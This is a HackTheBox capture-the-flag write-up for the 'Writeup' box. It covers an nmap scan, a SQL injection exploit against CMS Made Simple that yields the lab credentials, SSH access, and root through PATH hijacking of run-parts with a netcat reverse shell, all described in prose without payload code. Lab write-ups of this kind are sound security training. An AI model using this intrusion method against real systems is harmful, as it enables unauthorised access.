HackTheBox Writeup — Writeup
Hello Guys , I am Faisal Husaini. My username on HTB is “faisalelino” .
The IP of this box is 10.10.10.138
NMAP Results
nmap -sC -sV -oN nmap-writeup 10.10.10.138
We see 2 ports open , Port 22 and Port 80 running SSH and HTTP
We now check web services running on this machine.
Port 80 — HTTP Service
As we check the IP on the browser , we get to see
Running gobuster against this doesn’t work as there is a WAF
From the NMAP Scan , we can see that there is robots.txt file , checking it , we get
We see that there is a /writeup directory disallowed in the robots.txt file , let’s try to access it
We see a page , which is regarding writeups and all
Analyzing the page on Wappalyzer , we get to know
The page uses CMS Made Simple (CMSMS) , and looking for exploits for it on Google we get one for SQLi ( link at the end of this writeup)
Checking the usage of the exploit script , we see
So we need to specify the URL using -u and also specify it to crack and provide a wordlist
We are set and ready to run this script and here we do
So we got the Username as jkr and the password as raykayjay9
Now , from the documentation of this script , it was given that this CMSMS has an admin panel by default as /admin , in our case it is in /writeup/admin
As we can see it prompts us for the Username and Password , so we now put the credentials which we got after running the python exploit script
Hmmm!! It doesn’t work , but we remember from the NMAP Scan that we had SSH Open , so we try these credentials on SSH
We got successfully logged in as jkr through SSH , let’s try to get the user flag first
The user flag was located on the same directory where we were spawned after SSH Login , now time for Priv Esc
Privelege Escalation
We run pspy on this box and see what processes or crons are running
So we see that when we login through SSH each and everytime , “sh -c /usr/bin/env -i PATH=linuxpaths run-parts something “ is ran
Checking the permissions of the paths in the PATH variable , we see that
/usr/local/sbin directory has group permission for staff
When we run the id command , we can see that we can run or edit files as staff group member
So , now we will try to hijack the path and create our run-parts binary as the original one was located under /bin directory which was at the last of the PATH variable
We can hijack the PATH and create our own run-parts under /usr/local/sbin directory and then make it run through the SSH login
We created our binary and set the permission of it to 777
We can see that the file is created and the permissions are set
Now we set up netcat listener and wait for the connection after the new SSH login from us
Here we login through SSH again from another terminal so that we get hit for the shell
Boom! We got the reverse shell and we can check the details down below
Now we go for root flag which is usually located under /root/root.txt file
This was really a fantastic box and I really enjoyed solving this , Thanks to jkr for creating this box. If you loved reading this writeup , please do leave 50 claps :)